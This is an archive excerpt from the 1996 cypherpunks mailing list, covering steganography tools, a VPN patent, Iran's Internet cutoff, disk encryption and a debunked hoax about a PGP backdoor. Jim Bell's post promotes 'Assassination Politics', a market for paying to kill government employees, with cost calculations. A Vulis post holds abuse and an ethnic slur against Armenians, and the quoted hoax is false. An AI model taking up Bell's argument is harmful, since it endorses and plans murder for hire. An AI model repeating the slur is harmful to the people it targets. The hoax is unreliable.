On Wed, 28 Aug 1996, Douglas R. Floyd wrote:

> Try a mirror.  ftp.funet.fi,
> /pub/crypt/mirrors/soda/cypherpunks/filesystems/linux.

Unfortunately, funet is down also.  csclub.uwaterloo.ca/pub/linux-stego seems
to work right now.

- -- Mark

PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMiTKpizIPc7jvyFpAQHIfAgAzHhGF4Krei/QeaOL85TyqfMQVvCcCLsM
qs+3y2NqTSzoNAq4loV3B4foWSL6UsVjzNYVCVKnDZHC48FAA1uS1yNuW/k/Jx8c
2/2BEd4kkCDOqIT5dqg+EhQWGoJgKw265OP9YrmAOux+DWjznPXeiUsZYRtPKGFG
CKrt7Om9Knz3Gb0Yli8gYBZahtXfN6/lmfyViCmYvbc5INOupVfL+X4koxQRoVAe
f5uwiknaVaDYf5kc/Hr/xO1/UZvVXofJTInkdqP/D4ThCaCoH6m5c4TvMJBhU/3M
pTXYL6iU/lpa1bVfF1jmgilzsufJo0GmDtjdx2toKETBycaSOyQmDg==
=LecO
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 29 Aug 1996 12:45:49 +0800
To: cypherpunks@toad.com
Subject: Re: stego virus
Message-ID: <ae4a444102021004477c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:56 PM 8/28/96, Moroni wrote:
>   If a virus is embedded into a giff ,is it executed when the giff is or
>does it require the usual overwriting etc methods to execute it?
>                      TIA

The virus is activated when the GIF is _viewed_.

The viewing of the GIF activates the cerebro-visual processing centers of
the brain, activating the ancient Sumerian meme complex. I assume, of
course, you are referring to the deadly Snow Crash Good Times virus.

If infected, the only solution is to unsubscribe from the Cypherpunks list
before others are similarly infected.

Hey, Moroni, we've missed your particular slant these last few months.

--Klaus

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Thu, 29 Aug 1996 14:24:59 +0800
To: cypherpunks@toad.com
Subject: Re: SUN_pak
In-Reply-To: <199608281900.TAA15017@pipe2.t2.usa.pipeline.com>
Message-ID: <9608282355.AA00745@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


I was looking at the description of this patent (thanks to JYA for providing  
easy access to this article...), and I can't believe Sun got a patent for  
this.  Tunneling encrypted IP sessions over regular IP by using a gateway  
router is hardly a novel idea and is immediately obvious to anyone who is  
knowledgable in networking and crypto.  Aren't there already products out  
there (hardware and software) that implement this sort of thing?  I seem to  
remember Cisco producing a router and MorningStar producing software that did  
this.  I also seem to remember the concept being discussed on this very list  
several years back (can't check the archives from work though...)  I believe  
there is even a name for it:  VPN (Virtual Private Networks)  John Gilmore  
is currently putting together a project to do much the same thing in  
software...

Did I miss something innovative in this patent, or is this another example  
of clueless patent examiners granting patents for things that don't deserve  
patent protection?


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 29 Aug 1996 14:36:50 +0800
To: cypherpunks@toad.com
Subject: Re: Hayek (was: Cato Institute conference on Net-regulation)
In-Reply-To: <ae492e2b01021004ff49@[205.199.118.202]>
Message-ID: <8a0DTD20w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Senile tcmay@got.net (Timothy C. May) (fart) rants:

> At 4:26 AM 8/28/96, Dr.Dimitri Vulis KOTM wrote:
> >Senile tcmay@got.net (Timothy C. May) rants:
> >> Indeed, Hayek has had a _lot_ to do with the Cypherpunks! From "The Road t
> >> Serfdom" to "Law, Legislation, and Liberty," his works have exerted a
> >> profound influence on me, and on many others.
> >
> >But he's fucking unreadable.  I plan to teach economic this semester and
> >make every student read Hazlitt (economics in 1 lesson). I can't force them
> >to read hayek (or Rothbard) because they're fucking unreadable. Shit.
>
> Well, to one who inserts "(spit)" after nearly every name he cites, and
> critiques Hayek as "fucking unreadable. Shit.," I suppose Hayek must indeed
> seem unreadable. Shit.

Are you jealous, Tim )fart)? You're just a senile old fart, not worth my
spittle. I make you feel better I'll put (fart) after you stupid name. Shit.

> After all, Hayek rarely writes things like: "The senile Von Mises (spit)
> and his Sovok Cabal plotters...."

Senile Tim May (fart) exposes himself as a liar by attributing to me shit
I've never said (Pidor Vorobiev's forgeries). Please stop polluting this
mailing list with your lies and personal attacks.

> As to "forcing" your students to read Hayek, just who is in charge? If
> you're the instructor, they can choose to read what you tell them to read,
> or be unprepared on the exams you give and possibly flunk the class. What
> part of "Required Reading" do you or your students not understand?

It's been many years since Tim May (spit) has been to college, hasn't it?
I don't blackmail my students into doing the work they don't want to do
by blackmailing them with grades. When I taught comp.sec., I said from the
start that everyone gets an A, and I trust tgen to be motivated enough to
read everything I _suggest_ they read. And they all did a great job and
earn3d their A's.

Senile Tim May (fart) is a fucking statist asshole.

Fuck you and fuck your criminal Arm*nian grandparents.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 29 Aug 1996 13:45:40 +0800
To: cypherpunks@toad.com
Subject: Re: Real or Not ?
Message-ID: <ae4a4d480302100466a2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:09 PM 8/28/96, Declan McCullagh wrote:
>On Wed, 28 Aug 1996, Eric Murray wrote:
>
>> Heh.  They forgot the Black Heliocopters manned by agents of
>> the UN/New World Order, and the Greys from Zeta Reticuli..
>>
>> It's a hoax, with several clues that it is a hoax in it.
>>
>> Of course you're welcome to prove me wrong by disassembling
>> a PGP binary.  Examination of the random numnber generator, IDEA
>> key setup, or RSA key setup vs what's in the source code
>> should show if something fishy is going on.
>
>Unless of course the program you're using to view the disassembled
>instructions has also been altered by the TriLats. And make sure you use
>any pre-1992 compiler on a pre-1992 operating system on a computer that's
>not hooked up to the Net or even located where NSA agents can get to it.

Ha! You think a pre-1992 compiler and OS wil fix this? What about the processor?

I can assure you, as a longterm Intel employee during these formative
years, that Intel was pressured into including the famous "NSA
instructions" into the 8080, in 1974. These instructions are well-known,
and the Cray had them as well.

Inasmuch as the 8080 instructions live on in every x86 processor--like the
reptilian brain inside all of us--this gives the NSA instant access to all
contents of the processor.

This is why I use a Mac, of course.

--Perry Noyd

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@ACM.ORG>
Date: Thu, 29 Aug 1996 13:38:44 +0800
To: cypherpunks@toad.com
Subject: Re: A _REALLY_ Interesting Bet
In-Reply-To: <Pine.SUN.3.94.960828175406.25479A-100000@polaris>
Message-ID: <199608290229.TAA10523@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



Black Unicorn <unicorn@schloss.li> writes:
>Are these issues not listed currently on the IDEA FUTURES exchange?

>Anyone have the URL?

Idea Futures is dead, and the torch has passed to Foresight Exchange (FX),
which is at http://www.ideosphere.com/ideosphere/ .  You can bet on a number
of political issues (US and other), though not (yet) for real money.

Bill Clinton re-elected last sold at 89 (out of 100), and
Dole beats Clinton      last sold at 15.

This doesn't track the polls, which typically ask who the potential voter
would vote for rather than who they think will win the election.
Other issues:

Percentage of popular vote to Dem candidate: 47
"               "             Rep    "     : 44
"               "             Other  "     : 12

Note that there may be an opportunity for arbitrage when numbers don't add
up to 100; but I'm simplifying, since there are separate buy and sell bids.

Third party candidate gets the most votes  :  4
Clinton landslide                            20
Dole landslide                                4
Democrats retake the House in 96             45
Democrats retake the Senate in 96            30
Percent electoral votes to Democrats         70
President without popular majority           55
Clinton resigns or impeached by end of 96     1

And so on...

	Jim Gillogly
	Hevensday, 7 Halimath S.R. 1996, 02:29




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 29 Aug 1996 08:25:55 +0800
To: cypherpunks@toad.com
Subject: Re: Real or Not ?
Message-ID: <199608281949.TAA19170@pipe2.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


As a vulture investor in pgp.com I heartily endorse Paul's aggressive
cooperation with the Feds. Would not have trusted him with my tax-haven
wealth had he not had the balls to fight the gov to build his rep and then
wisely get in bed for the loving.   
 
 
That's how we gonna leverage PGP's worldwide trust to make lotsa dough like
all the patriotic giants of computer boom-boom-boom -- fake-fight the gov
and betray, betray, betray the stupes.  
 
 
Don't waste your life being a principled, poor outsider. Dive deep into the
shit with the titanic buzzards of the industry. It'll make your drooling
alma mater and yo sweet juicy momma call you a genius.  
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@scranton.com>
Date: Thu, 29 Aug 1996 10:21:38 +0800
To: cypherpunks@toad.com
Subject: stego virus
Message-ID: <Pine.LNX.3.95.960828195159.3614A-100000@user1.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain


   If a virus is embedded into a giff ,is it executed when the giff is or
does it require the usual overwriting etc methods to execute it?
                      TIA





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Thu, 29 Aug 1996 13:30:52 +0800
To: cypherpunks@toad.com
Subject: [NOISE]Re: stego virus aka Intro to Computers 101
Message-ID: <2.2.32.19960829025715.006ae4c0@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


trying not to be technical

Excecuting a program involves putting commands into the CPU. Move data such
as a GIF or a JPEG is not anywhere near the same.

GIF, JPEGs, TIFFs, WAVs, AUs, MPEGs are data. Not executables.

At 07:56 PM 8/28/96 -0400, you wrote:
>   If a virus is embedded into a giff ,is it executed when the giff is or
>does it require the usual overwriting etc methods to execute it?
>                      TIA
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Thu, 29 Aug 1996 13:46:29 +0800
To: cypherpunks@toad.com
Subject: NSF yanks Iran's Internet connection, from HotWired
Message-ID: <Pine.SUN.3.91.960828201016.9155O-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Wed, 28 Aug 1996 20:08:06 -0700 (PDT)
From: Declan McCullagh <declan@eff.org>
To: fight-censorship@vorlon.mit.edu
Subject: NSF yanks Iran's Internet connection, from HotWired

Attached is my column on the NSF and Iran. After I filed it, I received an
unconfirmed note from the NSF saying that they removed the restriction in
response to my calls earlier today. I'll verify tomorrow. 

I have some original documents on the Iran sanctions law and executive 
order at:
  http://www.eff.org/~declan/global/

-Declan


// declan@eff.org // I do not represent the EFF // declan@well.com //



http://www.netizen.com/netizen/96/35/special3a.html

HotWired
The Netizen

Banning Iran
by Declan McCullagh (declan@well.com)
Washington, DC, 28 August
   

   The US government has quietly pulled the plug on Iran's Internet
   connection. The catch? No one gave it permission.
   
   Earlier this month, a National Science Foundation official blocked
   crucial international links to Iran, apparently in response to an Iran
   and Libya Sanctions Act that became law on 5 August. The move prevents
   people in the United States from connecting to Iranian computers by
   cutting off access to the country's only permanent Net connection - a
   single, achingly slow 9600 bps modem.
   
   The link joins the Internet at Austria's Vienna University, which
   received a letter from an NSF employee - who the foundation claims
   acted without authority - asking their network gurus to cease
   forwarding Iranian data to American networks. The NSF employee, Steve
   Goldstein, told the university that the United States embargoed such
   exchanges with Iran.
   
   From Austria, packets travel across the Atlantic through links funded
   in part by US taxpayers, which Goldstein claims gives the NSF control
   over them. Goldstein works in the agency's Networking and
   Communications Research and Infrastructure division.
   
   The NSF's action, however, tramples on the First Amendment. The
   Supreme Court has upheld the right of Americans to receive a wide
   range of information from abroad. An existing executive order
   explicitly allows the import and export of Iranian informational
   materials regardless of medium of transmission, according to Solveig
   Bernstein, a lawyer with the Cato Institute. "Congress intended any
   sanctions the president took to be directed at money and weapons
   production, not communications," she said.
   
   The NSF isn't accepting responsibility. The agency claims Goldstein
   acted on his own volition. Although Goldstein declined comment, the
   agency's lawyers say he was not authorized to block the line. "We were
   not asked by Dr. Goldstein for any opinions, so I'm not sure on what
   basis we're doing it," said John Chester, NSF legal counsel. Other NSF
   officials did not return repeated phone calls.
   
   Many Iranians in the United States are outraged at losing access to
   friends, family, and educational links in Iran. Farhad Shakeri, a
   software engineer at Stanford University who operates the Iranian
   Cultural and Information Center, says: "Lots of people in Iran are
   confused. They can't talk to any university in the world.... We just
   want the problem fixed." Anoosh Hosseini, a webmaster at the Global
   Publishing Group, says: "It affects me as a person. I want to visit my
   cousin's homepage, and my brother's homepage. The University of Texas
   has a Middle Eastern research center, but now they can't research Iran
   [on the Net]."

###





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman OBC)
Date: Thu, 29 Aug 1996 14:07:22 +0800
Subject: Re: Real or Not ?
In-Reply-To: <199608281157.EAA04520@jobe.shell.portal.com>
Message-ID: <199608290321.UAA15144@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! I snagged this off a news group this AM.. comments??
! 
! A lot of people think that PGP encryption is unbreakable and that the
! NSA/FBI/CIA/MJ12 cannot read their mail. This is wrong, and it can be a
! deadly mistake. In Idaho, a left-wing activist by the name of Craig Steingold
! was arrested  _one day_ before he and others where to stage a protest at
! government buildings; the police had a copy of a message sent by Steingold
! to another activist, a message which had been encrypted with PGP and sent
! through E-mail.
! 
!  Since version 2.1, PGP ("Pretty Good Privacy") has been rigged to 
! allow the NSA to easily break encoded messages. Early in 1992, the author, 
! Paul Zimmerman, was arrested by Government agents. He was told that he 
! would be set up for trafficking narcotics unless he complied. The Government 
! agency's demands were simple: He was to put a virtually undetectable 
! trapdoor, designed by the NSA, into all future releases of PGP, and to
! tell no-one.
! 
!  After reading this, you may think of using an earlier version of 
! PGP. However, any version found on an FTP site or bulletin board has been 
! doctored. Only use copies acquired before 1992, and do NOT use a recent 
! compiler to compile them. Virtually ALL popular compilers have been 
! modified to insert the trapdoor (consisting of a few trivial changes) into 
! any version of PGP prior to 2.1. Members of the boards of Novell, Microsoft, 
! Borland, AT&T and other companies were persuaded into giving the order for
! the modification (each ot these companies' boards contains at least one
! Trilateral Commission member or Bilderberg Committee attendant).

The only true part in this hoax is the extent of corporate and political 
membership in international capitalist organizations like the Council of 
Foreign Relations, Trilateral Commission, Bilderbergers, and hundreds of 
other redundent alike organizations dedicated to making the whole world 
the same.

!  It took the agency more to modify GNU C, but eventually they did it.
! The Free Software Foundation was threatened with "an IRS investigation",
! in other words, with being forced out of business, unless they complied. The
! result is that all versions of GCC on the FTP sites and all versions above 
! 2.2.3, contain code to modify PGP and insert the trapdoor. Recompiling GCC
! with itself will not help; the code is inserted by the compiler into
! itself. Recompiling with another compiler may help, as long as the compiler
! is older than from 1992.

This identical post was included in an issue of Phrack about three or four 
years ago.  So this bogus post is already pretty old.  With all the real 
creepy stuff happening in the world, who needs to make up lies?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Thu, 29 Aug 1996 14:09:07 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Re: DoJ is poking around
Message-ID: <19960829032231781.AAA184@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


>> >looks like the DoJ have been looking around at the mirrors.. maybe to
>> >legally hassle people about them....

>> Or, just maybe, some DoJ employees wanted to see what folks on the outside
>> were doing to tweek their bosses:-)? Reminds me of the *thousands* of hits
>> the "Intel Secrets Page"(http://www.x86.org/) has gotten from users at
>> intel.com 

Out of curiosity, has anyone used a decompiler to check if any of the
undocumented stuff is getting used in shipping programs?

- "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said.
* Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 29 Aug 1996 11:49:36 +0800
To: rah@shipwright.com
Subject: Re: (flatulence): Reply-to loops
Message-ID: <01I8TLQPNVKG9JDG1J@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"rah@shipwright.com"  "Robert Hettinga" 28-AUG-1996 02:44:31.09

>We don't do it because of reply-to loops.

>Only idiots, or charitably, those with very low traffic, run their mail
>lists any other way.

>Accidentally sending private e-mail to the list is bad enough without
>bringing the listserver to its knees...

	Umm... only one other list I'm on does reply-to to something other than
the list, and some of those lists are running majordomo. Reply-to to the list
doesn't have to cause problems; only a few domains (compuserve.com, wow.com,
and one other that I can't remember offhand) cause error problems to reply-to
addresses. The point about low volume mailing lists vs high volume ones is,
however, a good point; the other list with reply-to to other than the list
that I'm on is one designed for low traffic.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damien Lucifer <root@HellSpawn>
Date: Thu, 29 Aug 1996 12:14:02 +0800
To: stewarts@ix.netcom.com
Subject: Re: Mimic Function Stego Programs?
In-Reply-To: <199608282111.RAA17052@cbig1.att.att.com>
Message-ID: <Pine.LNX.3.91.960828213126.4972A-100000@HellSpawn>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 28 Aug 1996 stewarts@ix.netcom.com wrote:

> Mimic Functions?  I'm looking for something that you can hand a grammar
> and a set of bits that will produce sentences in the grammar,
> plus a decoder that can take the sentences and reconstruct the bits.


I think Texto is what you are looking for, and it is available from the 
cypherpunks archive in the steganography directory. If you can't find it, 
drop me a private note and I'll mail it to you...

A quick outline of its function:

It uses a file full of Mad-Lib type sentence blanks, and a dictionary 
full of words arranged by type (person, place, thing, verb, etc). 
There are 64 words of each type which correspond to the 64 ascii symbols 
used in pgp ascii armor, or alternately, the 64 symbols used by standard 
uuencode.

The sentence structures look like:

The _THING _VERBs to the _PLACE.

It selects an appropriate word type for the particular blank it needs to 
fill, and inserts the word corresponding to the symbol in the data to be 
hidden.

Extracting the data from the resulting text is pretty straightforward:
All words that don't appear in the dictionary file are discarded. The 
words that remain are mapped back to their corresponding sybols. 

You can expect your data to grow to 10 times its original size in the 
process of steg'ing, and you'll have to ascii armor or uuencode the data 
before it can be stegged by this program, but its clever, and might fool 
a simple filter-bot or other program, although its doubtful it would ever 
fool a person. 



ciao





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wayne Clerke <wclerke@emirates.net.ae>
Date: Thu, 29 Aug 1996 08:45:17 +0800
To: "'cypherpunks@toad.com>
Subject: RE: File System Encryption
Message-ID: <01BB9543.4F6CD2E0@csa088.emirates.net.ae>
MIME-Version: 1.0
Content-Type: text/plain


The Drifter[SMTP:drifter@c2.net] wrote:
    On Wed, 28 Aug 1996 02:55:20 +0400, Wayne Clerke <wclerke@emirates.net.ae>
    wrote:
    
    >Tried secdev? Edgar Swank (author of secdrv) recently posted
    >that secdev (note, not secdrv) does, in fact, uses 32 bit disk 
    >access with win95. Win95 reports that the secure device is in 
    >compatibility mode, but the host disk (and therefore the secure 
    >volume file) is being accessed in 32 bit (disk) mode. Not sure 
    >what issues there are with '32 bit FILE access' mode here. 
    >
    >Sounds worth a try though. Please post the results if 
    >you try this.
    >
    
    I have actually had Secure File System, Secure Drive, and Secure Device
    all installed with mounted volumes at the same time under Win95.  However,
    32bit file access is not the problem.  When you load a TSR in Win95, the
    operating system forces you into 16bit DOS compatability mode.  I'm not a
    kernal guru so I can't explain all the specifics, but it basically makes
    95 act as Win-3.11 and looses multithreading (as it were) and creates
    serious memory paging problems if you have >32mb installed.

You've got this all wrong. Only certain types of TSRs cause 
this. I'll leave it to an expert and just quote the author of secdrv:

Edgar Swank wrote:
>For those users of Win95 and SecureDrive who are concerned about loss
>of 32-bit disk access, I've recently learned that use of Secure Device
>
>  ftp.demon.co.uk:/pub/ibmpc/secdev/secdev14.arj
>
>instead avoids this requirement. Although the Secure Device virtual
>drive is listed as in compatibility mode, the real drives are not so
>affected.  And since the virtual drive is mapped to a dos file on one
>of the real drives, I believe you get 32-bit phyical drive access
>there as well, although access is still slowed by CPU time necessary
>to encrypt and decrypt.
    
    Thanks for the reply though .. and if you need assitance with getting
    SECDEV working under 95, just drop me a note.

Thanks for the offer ... 

    Drifter

Regards,


EMail: wclerke@emirates.net.ae
PGP key ID: AEB2546D		FP: D663D11E DA19D74F 5032DC7E E001B702
PGP mail welcome.		Voice: +971 506 43 48 53
<a href=mailto:wclerke@emirates.net.ae>Wayne Clerke</a>
If you're not living on the edge, you're taking up too much space.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 29 Aug 1996 15:39:45 +0800
To: "Jon Leonard" <cypherpunks@toad.com
Subject: Re: MUD anyone?
Message-ID: <199608290508.WAA00670@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:47 AM 8/27/96 -0700, Jon Leonard wrote:
>> Would anyone out there be interested in helping set up a 
>> crypto-anarcho-capitalist MUD to play around with some of the social 
>> aspects of crypto-anarchy and anarcho-capitalism? I can probably hack 
>> together a basic lpmud in a month or two if someone has a machine which 
>> it could run on and which could run a mailing list for those involved. 
>
>I've been planning to run a MUD like that, at mud.umop-ap.com port 2121.
>I just don't have enough coded to be worth announcing yet.
>Which cryptographic primitives should be coded in initially?
>Obvious choices are:
>Pseudonyms
>Anonymous digital cash (issued by any pseudonym, not just "banks")
>Public and private keys
>Secret sharing
>Anonymous broadcast & message pools
>Anonymous markets
>
>What am I missing?  Should there be direct support for Jim Bell's
>assasination markets?  It'd provide a means of demonstrating its
>ineffectiveness as a means of social control.

Aren't you writing up the results of the experiment before you even take the 
data?  That's called "dry-labbing."  

In any case, I'd welcome such a simulation, but there are a number of 
caveats.  To me, the most obvious one is GIGO:  Simulations, especially 
political/social ones, might depend heavily on assumptions that are 
programmed into them.   A trivial, yet interesting example is the computer 
game "Sim City" which allowed you to adjust the "tax rate" but problems 
always cropped up the further away you were from 7%.   The libertarians were 
frustrated that we were unable to drop the tax rate and still get a 
well-functioning, happy society.  It is unlikely, obviously, that there is 
anything magical to a society about a tax rate of 7%   The answer is likely 
that the people who wrote the program simply hard-coded it into the game, 
either directly or as a consequence of various political/social assumptions 
that they didn't realize they were making.

Another problem was demonstrated a few weeks ago when a "game theory"-type 
problem was proposed on CP, the one where 20 thieves sequentially are given 
the task to propose the disbursement of $20 million in loot, with a vote on 
the proposal and death for the proposer of a rejected proposal.  I pointed 
out that the difficulty with an _exact_  (game-theoretical) solution to such 
a problem is that the "cost" of death in this problem is undefined.  A 
person might be willing to take a risk of death for $20 million that he's 
unwilling to take for $20 THOUSAND,  and certainly not $20 DOLLARS.

AP (Assassination Politics), at least the initial "government-eliminating" 
function of it, should work on a financially-sound principle:  Actuarially, 
the value of a continuing $1/year obligation is $20 if the real interest 
rate is 5%.  This means that if a randomly-selected government employee is 
paid $40K per year including benefits (money which is stolen from 
taxpayers), it would be worth a one-time cost (actuarially speaking) of 
20x40K, or $800,000 to see him dead and not replaced.   Assuming his death 
can be purchased for less than this, you are dollars ahead to buy it.  If 
you can buy his death for, say, $20,000 (half his yearly salary) you have, 
in effect, profited by $800,000-$20,000 or $780,000 to do this.

(Technically, the amount _society_ would benefit is actually the amount of 
salary cost eliminated, minus the ordinary benefit  of that government 
employee doing his usual job.  A person (statist?) might try to conclude 
from this that getting rid of them won't save much.  That's the collectivist 
point of view.   However, the people who (unwillingly) finance these 
salaries with their tax dollars, and the people who arguably benefit from 
these employees are, in my estimation, two separate and distinct groups of 
individuals, so my analysis is still valid for the former group.) 

It gets even better.  If most of these employees decide that discretion is 
the better part of valor, and 90% of them resign rather than (almost 
literally!) get the ax  then the average cost of getting rid of a given 
employee is reduced by another factor of 10, perhaps to $2,000.   And 
obviously, the system feeds on itself:  Once the average cost of getting rid 
of them drops to $2,000, their fate is so certain that the resignation rate 
would probably skyrocket to well over 99%, which would further reduce the 
average cost to perhaps $200, and so on.  The overall effect is somewhat 
akin of "falling off a cliff," or perhaps the collapse of a star destined to 
become a black hole:  Once a certain point it reached return is impossible 
or impractical. 

Now you should understand why I'd be quite pleased to see such a system 
modelled:  It would be great to be able  to vary the initial conditions, and 
see that the outcome turns out almost identically each time.  Such an 
outcome would make you very nervous:  It would show that I am correct!

(BTW, a similar analysis will probably suggest that the amount of money 
traditionally spent on US national defense would drop from the current 
figure of about $250 billion to no more than 1/1000th of this, or maybe even 
far less, and for similar reasons.)


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@prairienet.org>
Date: Thu, 29 Aug 1996 15:20:37 +0800
To: cypherpunks@toad.com
Subject: Clinton follies ideas?
Message-ID: <199608290308.WAA11904@bluestem.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Wed Aug 28 21:57:52 1996
Our esteemed figurehead, Bill Clinton, will be doing
the first stop of his "Road to Victory Tour" campaign
this Friday, just a few blocks from my apartment.  Does
anybody have any cool suggestions on things to do to
harass, heckle, or maybe get taken down by the Secret
Service?  (Or should I just yell, 'Clinton, you suck!'? :)

dave

Special P.S. to all FBI wiretappers: This is a joke.



- ----- David Smith, Thinker of Deep Thoughts  :)
http://www.prairienet.org/bureau42/library.html
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMiUHMzVTwUKWHSsJAQE4ygf9F5ihhla2NguUFEFEgqDEb97haqqIv2ak
MQ07CRohP+QHYBsMnsnqjMvZslVnQCkr+mJWa8DC22dEPvGQ58+8NdsuykspIgEE
jegvZuQqGBmHex3fz6NLcYBQXFuyF8fbGEaXuHJjmvszkZDBqe3Fo95ywuMJPklZ
TIpZjE2xbX7T+H6yK2itIi/cmyPHN7zTfHKpdvjWcAY6hMVXuQwLx5g/cg3AErA4
R7MhDTnL2uH/16ccYQKPnpyBqxZ/DYg/DzrwO0Jj1RzeXBllTyALXMt5pQRKrbuy
xl8IJJ4j1cFIjeiOvg/tTBpOoFP1f3tj8iDLBYrzqxCytelyWxgQnw==
=LK29
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas R. Floyd" <dfloyd@io.com>
Date: Thu, 29 Aug 1996 14:30:19 +0800
To: hag@ai.mit.edu
Subject: Re: Real or Not ?
In-Reply-To: <199608282125.RAA26272@galapas.ai.mit.edu>
Message-ID: <199608290317.WAA04148@xanadu.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
>  > > It took the agency more to modify GNU C, but eventually they did it.
>  > >The Free Software Foundation was threatened with "an IRS investigation",
>  > >in other words, with being forced out of business, unless they complied. The
>  > >result is that all versions of GCC on the FTP sites and all versions above
>  > >2.2.3, contain code to modify PGP and insert the trapdoor. Recompiling GCC
>  > >with itself will not help; the code is inserted by the compiler into
>  > >itself. Recompiling with another compiler may help, as long as the compiler
>  > >is older than from 1992.
> 
>     Umm, no.  I work for the Foundation in my copious free time.  This
> has never happened.  And I just asked Richard about it to be sure.  He
> was amused.
>     It would be *very* difficult to pass this by anyone.  People at
> FSF diff the source code a lot, and we're far from the only ones.
> 

This has been a common joke for years now, the gcc "virus".  Its nothing
more than a troll.

(Its getting boring, however)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Institute for Security and Intelligence" <isi@hooked.net>
Date: Thu, 29 Aug 1996 16:32:02 +0800
To: "William H. Geiger III" <whgiii@amaranth.com>
Subject: Re: In reference to comments made to me and to the Group
Message-ID: <199608290618.XAA12301@mom.hooked.net>
MIME-Version: 1.0
Content-Type: text/plain


Mr. Geiger:

I do not have interest in nor time for a flame war.  But I do appreciate 
your perspective, whether or not I agree.

Rather than flaming, I propose that all interested readers post their 
*CONSTRUCTIVE* ideas on the CyberTerrorism issue.  If you feel it is 
not an issue, then don't respond.  

I'm not looking for opinions on politicians, the government, etc., 
nor do  I care what you think of me or my views.  However, if you can 
put  some _solid_ thoughts into bullet items, or any other format you 
deem useful, perhaps we can move forward.

Ideas.  Actions.  No commentary, raves, rants, flames, or other bandwidth wasters.

Let's see what we come up with.

Barry C. Collin
Institute for Security and Intelligence




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 29 Aug 1996 14:26:58 +0800
To: Skeeve Stevens <skeeve@skeeve.net>
